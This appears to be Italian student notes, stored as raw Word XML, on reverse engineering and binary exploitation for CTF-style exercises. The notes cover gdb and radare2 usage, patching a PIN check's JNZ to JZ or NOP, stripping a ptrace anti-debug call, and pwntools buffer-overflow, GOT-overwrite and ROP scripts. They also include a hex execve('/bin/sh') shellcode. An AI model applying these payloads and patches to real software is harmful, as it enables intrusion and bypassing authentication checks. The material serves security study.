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[pag 117 gabriel]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002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chmod +x nome file (permessi)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objdump -d</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> hello_world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 può semplicemente chiamare </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strings hello_world</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e si vede subito la flag. Soluzione spesso non ammessa.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—--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^C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ltrace ./funmail</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, possiamo notare, inserendo come username john galt, la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composizione logica del programma.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—--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La patch qui è molto semplice, quello che dobbiamo fare è cambiare la condizione di salto: se i PIN sono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uguali, andiamo al ramo sbagliato, altrimenti andiamo al ramo corretto. Invece del jnz (salto se non zero, il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che significa se sono diversi) vogliamo jz (salto se zero, cioè se sono uguali).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Posizionandosi nel punto dell’istruzione “The pin is correct” e aprendo la “hex view”, vediamo che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l'istruzione è 75 CD, dove 75 è l'opcode per JNZ. A questo punto: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Possiamo sostituire questa con </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">74 CD, dove 74 è l’opcode per JZ (Jump if Zero)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, saltando sempre nel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ramo giusto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Possiamo sostituire 75 CD con 90 90, dove 90 è NOP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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016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Usiamo il </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="980000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">debugger gdb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> per risolverlo. Quindi, si scrive </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gdb funmail2.0.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Eseguendo gdb, possiamo impostare un breakpoint (scrivendo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">break main oppure anche b main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Dopo aver scritto </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run (oppure r)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> dovremmo vedere diverse informazioni sull'esecuzione.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Ora possiamo fare quello che vogliamo, ad esempio chiamare showEmails, dato che vediamo dalle istruzioni precedenti che la sua chiamata rimane sullo stack.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Possiamo semplicemente digitare in ordine: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">b* main – run - j* showEmails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Che restituisce quanto segue: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Alternativamente, si salta direttamente a printFlag: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">b* main – run - j* printFlag </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(permesso dall’esercizio)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2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gdb run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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disas decrypt_flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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b* 0x00000000004008a8  (prima del puchar)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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printf "%s", (char*) flag_buf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29">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear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Alternatively, you can use the command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x/s (char*)ltrflag_buf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 to see the content of the variable. (oppure 0xAddress)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:before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before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gdb dontdebugmeplease – b* main – r – disassemble/disas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before="240" w:lineRule="auto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PER L’ESERCIZIO CON CONTROLLO SU STACK DEBUG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togli call ptrace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 dentro a init (vista da start che si avviava prima di main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gdb nome_es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run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poi controllo su main,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disas main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vedo confronto su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strcmp deii registri rsi e rdi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metto breakpoint in quella call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b* 0x5555554008d6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run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info registers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x/s 0x5555554009d0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PWN esempio codice phyton con pwntools (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="9900ff"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gets</w:t>
      </w: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from pwn import *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# Carica il binario (sostituisci con il path corretto)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exe = "./pwn0"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elf = context.binary = ELF(exe, checksec=False)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# Avvia il processo locale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 = process(exe)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 Costruzione del payload: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 64 byte per riempire buffer + "H!gh" per sovrascrivere josh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payload = b"A"*64 + b"H!gh"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# Invia l'input al programma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p.sendline(payload)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# Ricevi e stampa l'output (compresa la flag)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print(p.recvall().decode())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JAVA  →&gt; vedi sol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:widowControl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Alla fine del main:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="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if(user.call) user.call();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:widowControl w:val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→ Se sovrascrivi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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">call</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> con un indirizzo a tua scelta, il programma salta lì.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054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exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055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56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4007a2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'java'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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059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'./java'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A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B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ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat flag.txt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SHELLCODE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Suggerimento per gli esercizi: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Trovare l'indirizzo di ritorno dall'inizio del buffer potrebbe essere complicato.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  <w:t xml:space="preserve">Possiamo creare uno schema che non si ripete (ciclico) e vedere quale parte del pattern sovrascrive l'indirizzo di ritorno. In questo modo, possiamo capire </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">l'offset (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ret_addr - buff_addr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)!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Comandi utili di gdb-peda:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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pattern_create size [file]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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pattern_search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indirizzo funzione shell()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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nm -n pwn1 | grep " shell"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one line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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python3 -c 'import struct; print("A"*132 + struct.pack("&lt;I", 0x080484ad).decode("latin-1"))' | ./pwn1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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35.2" w:lineRule="auto"/>
        <w:ind w:left="800" w:right="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we are inside the debugger with the program loaded. We can check the security mechanisms of the application by typing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checksec </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command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="235.2" w:lineRule="auto"/>
        <w:ind w:right="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 are disabled (e.g., </w:t>
      </w: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canary</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), which means that we can overwrite the memory and reach the return address of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main </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">function. Our goal is to call the function </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">print_flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which contains the actual flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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ff0000"/>
        </w:rPr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'./hi'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the binary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p64(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symbols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'print_flag'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Get the address of the print_flag function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Fill the buffer with garbage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the payload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'./hi'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Start the process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Send the payload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Receive the output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 the output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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38761d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OFFSET.PY</w:t>
        </w:r>
      </w:hyperlink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(64bit)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"./hi"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cyclic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corefile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cyclic_find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.rsp,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  #find(core.eip) 32bit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"Offset:"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sgreva@sgreva:~/Desktop/Challenges16/2_hi$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file ./hi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./hi: ELF </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">64-bit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=32250918371febe99b40bdabdd469d16090ffdeb, not stripped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sgreva@sgreva:~/Desktop/Challenges16/2_hi$ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087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64 bit → 8 byte (return address, saved RBP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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SHELLCODE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0" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qxtgrl13qaku" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Andika" w:cs="Andika" w:eastAsia="Andika" w:hAnsi="Andika"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1️⃣ Shell-Storm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="1155cc"/>
          <w:u w:val="singl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http://shell-storm.org/shellcode/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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cerca per parola chiave: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"execve /bin/sh"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"spawn shell"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38761d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b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> CON SHELLCODE  (32 bit)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p32(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08048541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44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shellcode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\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80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shellcode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'./pwn2'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9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Quindi costruisci il payload così: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garbage = 'A'*44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riempi il buffer fino a EIP.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target_address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al posto di EIP ci metti l’indirizzo della funzione </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lol()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Quando la funzione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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> fa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ret</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, il flusso va a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lol()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1"/>
          <w:numId w:val="4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Dentro </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lol()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> c’è </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jmp %esp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quel momento </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%esp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> punta subito dopo al valore che hai messo come return address, cioè al tuo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode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shellcode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è il classico shellcode Linux 32-bit che fa una </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">execve("/bin/sh")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1"/>
          <w:numId w:val="4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Quindi, quando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jmp %esp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> viene eseguito, il controllo passa direttamente qui.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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SICUREZZA FILE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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checksec --file=nomefile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5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no CANARY → offset/shell/return</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6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Partial RELRO → GOT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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38761d"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GOT (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="9900ff"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scanf/puts/exit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="38761d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Il nostro primo passo è estrarre l'indirizzo GOT della funzione puts e l'indirizzo della funzione win. Questo potrebbe essere fatto facilmente con </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">radare2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comandi:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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r2 ./nomefile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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afl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC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Da qui, usiamo il comando pd per stampare il disassembler di una funzione, usando il numero di inizio e una handle con la @. Per esempio, per vedere le chiamate della funzione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, usiamo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pd 1 @sym.imp.puts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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  <w:t xml:space="preserve"> GOT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putsGOT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'804a00c'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winAddr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'0804854b'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'./auth'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putsGOT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winAddr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EXPLOIT2.PY</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> GOT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"./auth"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"./auth"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#the program requires to send an address and we're gonna send the "exit" function, exchanging it with"win" one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'puts'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symbols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color w:val="1155cc"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPLOIT%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d.PY</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> GOT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'804a01c'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-&gt; "134520476"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winAddr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'080485c6'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-&gt; "134514886"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'./vuln'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'address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winAddr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“Quindi </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ti sputa su stdout l’indirizzo di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(un pointer di 4 o 8 byte).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Se il binario è PIE (indirizzi randomizzati), questo leak ti serve per calcolare la base del binario. Se </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NON è PIE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, in realtà non serve neanche, perché gli indirizzi sono fissi.”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EXPLOIT_GOTPIE.PY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Import everything in the pwntools namespace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The target binary is 64-bit.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While we can explicitly specify the architecture and other things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 the context settings, we can also absorb them from the file.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'./challenge'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an instance of the process to talk to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.path)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Receive the address of main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up a copy of the ELF so we can look up its GOT and symbol table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Fix up its base address.  This automatically updates all of the symbols.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.address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.symbols[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We want to overwrite the pointer for "read"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.got[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We want to overwrite it with the address of the function that gives us a shell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.symbols[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'oh_look_useful'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Log some useful information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"Main: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"Address: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.address)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"Where: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"What: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Send the payload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Enjoy the shell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color w:val="38761d"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ROP (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="9900ff"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ret</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="38761d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r2 ./nomefile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per radare2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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aaaa</w:t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afl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per la lista delle funzioni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pdf @ sym.funzione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per aprire la funzione che ci interessa</w:t>
      </w:r>
    </w:p>
